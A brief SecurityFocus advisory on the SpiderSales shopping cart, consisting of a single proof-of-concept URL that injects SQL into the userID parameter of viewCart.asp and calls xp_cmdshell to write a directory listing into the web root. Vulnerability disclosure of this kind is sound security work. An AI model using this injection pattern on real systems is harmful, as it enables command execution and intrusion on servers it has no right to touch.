SpiderSales Shopping Cart Multiple Vulnerabilities

The following proof of concept has been provided:

http://www.example.com/Carts/Computers/viewCart.asp?userID=2893225125722634';exec%20master..xp_cmdshell%20'dir%20c:%20>%20c:\inetpub\wwwroot\dirc.txt'--&viewID=48


 

Privacy Statement
Copyright 2010, SecurityFocus